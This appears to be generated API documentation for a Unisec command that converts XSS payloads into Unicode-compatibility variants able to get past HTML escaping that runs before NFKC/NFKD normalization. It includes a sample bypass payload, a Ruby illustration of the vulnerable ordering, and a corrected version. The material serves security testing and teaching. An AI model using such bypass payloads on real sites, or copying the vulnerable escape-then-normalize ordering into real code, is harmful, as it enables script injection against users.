Class: Unisec::CLI::Commands::Normalize::Replace

Inherits:
Dry::CLI::Command
  • Object
Defined in:
lib/unisec/cli/normalization.rb

Overview

Command `unisec normalize replace "example"`

Example:

```plaintext
➜ unisec normalize replace "<svg onload=\"alert('XSS')\">"
Original: <svg onload="alert('XSS')">
U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E

Bypass payload: ﹤svg onload=＂alert(＇XSS＇)＂﹥
U+FE64 U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+FF02 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+FF07 U+0058 U+0053 U+0053 U+FF07 U+0029 U+FF02 U+FE65

NFKC: <svg onload="alert('XSS')">
U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E

NFKD: <svg onload="alert('XSS')">
U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E

➜ echo -n "<svg onload=\"alert('XSS')\">" | unisec normalize replace -
```
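Why the replaced payload above defeats an escape-then-normalize pipeline, and what the correct order looks like, as an added Ruby example that is not part of unisec (it assumes `CGI.escapeHTML` as the escaper and uses the bypass payload shown on this page as constructed input):

```ruby
# Added example, not unisec's own code. Unicode compatibility characters such
# as U+FE64 SMALL LESS-THAN SIGN are not in an HTML escaper's table, so they
# pass through untouched; a later NFKC/NFKD step folds them back to ASCII.
require 'cgi'

# Constructed sample: the "Bypass payload" from this page, built from its
# code points so the file stays ASCII-safe.
BYPASS = "\uFE64svg onload=\uFF02alert(\uFF07XSS\uFF07)\uFF02\uFE65".freeze

# Vulnerable ordering: escape first, normalize afterwards. The escaper sees
# no '<', '>', '"' or "'" and changes nothing; normalization then restores
# the ASCII delimiters, yielding live markup.
def escape_then_normalize(input, form = :nfkc)
  CGI.escapeHTML(input).unicode_normalize(form)
end

# Corrected ordering: normalize first so compatibility characters become
# ASCII before the escaper runs, then escape. Output contains no raw tags.
def normalize_then_escape(input, form = :nfkc)
  CGI.escapeHTML(input.unicode_normalize(form))
end

# True when the output still carries unescaped tag delimiters, i.e. the
# escaping step was bypassed.
def tag_delimiters_present?(html)
  html.include?('<') || html.include?('>')
end

if __FILE__ == $PROGRAM_NAME
  %i[nfkc nfkd].each do |form|
    puts "#{form} escape-then-normalize: #{escape_then_normalize(BYPASS, form)}"
    puts "#{form} normalize-then-escape: #{normalize_then_escape(BYPASS, form)}"
  end
end
```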

Instance Method Summary

  • #call(input: nil, **_options) ⇒ Object

Instance Method Details

#call(input: nil, **_options) ⇒ Object

Prepare an XSS payload for an HTML-escape bypass, i.e. for a pipeline that HTML-escapes the input and then applies NFKC / NFKD normalization.

Parameters:

  • input (String) (defaults to: nil)

    Input string to normalize; pass `-` to read it from standard input.

```ruby
# File 'lib/unisec/cli/normalization.rb', line 79

def call(input: nil, **_options)
  # A single dash means "read the payload from standard input", as in the
  # `echo -n ... | unisec normalize replace -` example above.
  input = $stdin.read.chomp if input == '-'
  puts Unisec::Normalization.new(input).display_replace
end
```